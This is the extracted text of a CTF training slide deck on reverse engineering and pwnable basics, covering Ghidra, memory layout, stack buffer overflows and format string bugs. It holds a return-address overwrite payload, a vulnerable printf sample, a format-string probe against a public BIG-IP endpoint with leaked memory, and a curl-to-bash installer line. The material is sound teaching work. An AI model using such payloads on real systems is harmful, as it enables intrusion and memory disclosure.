Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx

Reverse Engineering & Pwnable for CTF Powered By: Kusol Watchara-Apanukorn

Kusol Watchara-Apanukorn (Boss) Head of Cyber Security Consultant @Sectrike Co., Ltd Certificate: OSCP, GPEN, eCXD, Python for Pentester Hobbies: IoT CVE Hunter Bug Bounty Hunter CTF LinkedIn Profile: https://th.linkedin.com/in/kusol-watchara-apanukorn-808094146 WHO AM I?

TABLE OF CONTENTS Basic Knowledge 01 Introduction 02 Basic of RE Reverse Engineer 03 Basic of PWN Pwnable 04 Summary

Introduction

Reverse Engineering Definition Reverse engineering is considered as the process of developing a set of specifications for a complex hardware system by an orderly examination of specimens of that system. It is assumed that the specifications are being developed for the purpose of making a clone of the original hardware system, a circumstance which requires the most comprehensive form of specifications. Ref: https://ieeexplore.ieee.org/abstract/document/6313354

Reverse Engineering Basic Knowledge for CTF Read pseudo -code Known some assembly Coding

Reverse Engineering Common language in CTF C C++ Rust Golang C# or .NET JAVA Python (pyc or py)

Low Level Language Manually memory management Communicate directly to hardware/os True low-level: Assembly and machine code These days, we category C and C++ are low-level language.

Reverse Engineering Common binary file PE file (.exe or .dll) ELF file (elf) APK file (apk) .NET file (.exe) JAVA file Python file (pyc or py)

Reverse Engineering Common Goal Search the hardcoded Modify the target program to change logic Analyze the program how it work? (This is between reverse engineering and pwnable) Hidden function Valid input to show the flag

Pwnable Aka Pwned/Pwn It’s a slang word that mean totally defeat or dominate. The earliest known use of the verb pwn is in the 1990s. The earliest evidence for pwn is from 1999, in a message posted on the Usenet newsgroup rec.games.computer.ultima.online. Ref: https://www.oed.com/dictionary/pwn_v?tl=true

Pwnable Basic knowledge Reverse engineering Read pseudo-code Known some assembly Coding Memory vulnerabilities like buffer overflow and format string

Pwnable Common binary file PE file (.exe or .dll) ELF file (elf) Python file (pyc or py)

Pwnable Common CTF Goal Analyze the program how it work? (This is between reverse engineering and pwnable) Hidden function Valid input to show the flag Time attack Exploit memory vulnerability program like: Buffer overflow in ARM, x86, x86_64 Format string vulnerability Return-oriented programming (ROP)

Reverse Engineering

Disassembly Ghidra [Free] IDA [Free/Paid] Hopper [Paid] Radare2 [Free] Decompiler (like JAVA and .NET) JADX JD-GUI dnSpy ILSpy decompiler.com Reverse Engineering Tools

Tricks Whenever you get a file, issuing file command first to it to know what really file is it. Use strings <filename> command to read the strings in the binary to find some clues. Maybe some grep -i command too. Reverse Engineering Tools

Root-Me Challenge

Download here: https://github.com/NationalSecurityAgency/ghidra/releases Ghidra Basic Usage

Windows https://oracle.com/java/technologies/downloads/#jdk22-windows Linux $ sudo apt update $ sudo apt install default-jdk Ghidra (Java Issue)

Execute the bash file Ghidra Basic Usage

Create a new project Ghidra Basic Usage

Choose any and click next button Ghidra Basic Usage

Choose project directory and name the project. After done click “Finish” Ghidra Basic Usage

Import the lab’s file by using “Import FIle… function”. Ghidra Basic Usage

Click OK. Ghidra Basic Usage

Double click on lab’s file. Ghidra Basic Usage

Click yes to analyze the binary file. Ghidra Basic Usage

Use default setting and click analyze. Ghidra Basic Usage

Analyze the main function. Ghidra Basic Usage

Analyze the pseudo code. Ghidra Basic Usage

__s1 must be “123456789” to get into iVar1 == 0 condition. Ghidra Basic Usage

Please solve this challenge from root-me.org Reverse Engineering Lab

ELF x86 - Basic minutes 20

Pwnable

Windows debugger tools WinDbg Immunity Debugger Linux debugger tools GDB GDB-GEF GDB-PEDA Exploit tools Pwntool (python library) Ropper ROPGadget Pwnable Tools

Tricks Run checksec check the properties of executable of binary security. You need strong in Assembly Language, computer architecture, C programming (Reverse engineering) and Python language to make script for this challenge! Pwnable Tools

X86-64 Linux Memory Layout Stack Manage local variables Function arguments Control information such as return address Heap Dynamic memory allocation malloc(), calloc(), new() Data Statically allocated data Like global variables, static vars, string constants Text / Shared Libraries Executable machine instructions Read-only Stack Shared Libraries Heap Data Text 0x00007FFFFFFFFFFF 0x0000040000000000 Ref: https://slideplayer.com/slide/14508799/

Memory Allocation Example Ref: https://slideplayer.com/slide/14508799/

Memory Allocation Example l ocal 0x00007ffe4d3be87c p 1 0x00007f7262a1e010 p3 0x00007f7162a1d010 p4 0x000000008359d120 p2 0x000000008359d010 b ig_array 0x0000000080601060 h uge_array 0x0000000000601060 m ain() 0x000000000040060c useless() 0x0000000000400590 Stack Heap Heap Data Text 00007F 000000 Ref: https://slideplayer.com/slide/14508799/

Sample Memory Safety Vulnerability Stack-based buffer overflow Heap-based buffer overflow Format string vulnerability Use after free … Ref: https://cwe.mitre.org/data/definitions/119.html

Install Debugger Plugin Install GEF (Linux) https://github.com/hugsy/gef Install: bash -c "$(curl -fsSL https://gef.blah.cat/sh)"

Vulnerable Buffer Code Buffer Overflow

Buffer Overflow Disassembly

What happened? Stack Frame for call_echo Return Address (8 bytes) Unused [9] [8] [7] [6] [5] [4] [3] [2] [1] [0] buf[10]

Buffer Stack Stack Frame for call_echo Return Address (8 bytes) Unused [9] [8] [7] [6] [5] [4] [3] [2] [1] [0] buf[10]

Buffer Overflow Stack Stack Frame for call_echo Return Address (8 bytes) Unused [9] [8] [7] [6] [5] [4] [3] [2] [1] [0] buf[10]

0x00000000004011c8 Return address of echo()

Breakpoint at 0x4011c8 (return) Analyze before return

Run the program Analyze before return

Control Pointer

0x00000000004011c8 Return address of echo()

Analyze RBP Analyze before return

Overwrite RBP Analyze before return

We do buffer overflow to RBP. Next step How to replace RIP? What address that we want to return? What happened right now? RIP Address (8 bytes) RBP Address (8 bytes) Buf [10]

Overwrite RIP (exit and get in gdb again first) Control Pointer

No one call? Can we call it? Unused function

0x00000000004011da Unused function ( Disassembly )

Data: 0x01020304 Little Endian vs Big Endian Little Endian Big Endian 04 03 02 01 01 02 03 04

Linux: lscpu | grep Endian How to check byte order

r un <<< $(python -c “print ‘A’*18+’\xda\x11\x40’”) 0x4011da -> \xda\x11\x40 Return to smash() function

Please solve this challenge from root-me.org Pwnable Lab

minutes 45

Format String Vulnerability

The Format Function is an ANSI C conversion function. Example function: printf fprintf Converts a primitive variable of the programming language into a human-readable string representation. Format Function

The Format String is the argument of the Format Function and is an ASCII Z string which contains text and format parameters. Example: printf (“The magic number is: %d\n”, 1911); The Format String Parameter , like %x %s defines the type of conversion of the format function. Format String

#include <stdio.h> void main(int argc, char **argv) { // This line is safe printf ("%s\n", argv [1]); // This line is vulnerable printf ( argv [1]); } Vulnerable Code No input validation

Normal Situation

Memory Leaked

Denial of Service

Common parameters used in a Format String Attack

Real Life?

Reverse Engineering

Public Vulnerability

Payload: https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x Log Result: Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile: 0000004c:0000004c:08cb31bc:08cba210:08cc4954:01000000:ffeaa378:f5aa8000 Public Vulnerability

Public Vulnerability

Secure coding perspective Developer need to understand the function that they will use. Web Application Firewall (WAF) You can block the specific message like %s, %x, %p, … Attack Analysis You can analyze common attack parameter like %s, %x, %p, … Pentester You know more technique :D Format String Summary

False Positive (URL Encoding)

Please solve this challenge from root-me.org Pwnable Lab

Summary

https:// c tf101.org [Basic to intermediate ] http://pwnable.kr/ [Basic to advance] https://www.youtube.com/@LiveOverflow [Basic to expert] https://guyinatuxedo.github.io/ [Basic to expert] https://exploit.education/ [Basic to expert] Learning Resources

Tool is just tool!!! Tool could help you, when you have a knowledge. To solve reverse engineering/pwnable CTF you need to learn a lot. Self-learning is the key!!!! Final Thing

Thank You Any Question?

Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx

About This Presentation

Slide Content

Tags

Categories

Download

Quick Actions

Statistics

Related Slideshows

Secstrike : Reverse Engineering &amp; Pwnable tools for CTF.pptx

About This Presentation

Slide Content

Slide 1

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14

Slide 15

Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32

Slide 33

Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Slide 39

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58

Slide 59

Slide 60

Slide 61

Slide 62

Slide 63

Slide 64

Slide 65

Slide 66

Slide 67

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

Slide 73

Slide 74

Slide 75

Slide 76

Slide 77

Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx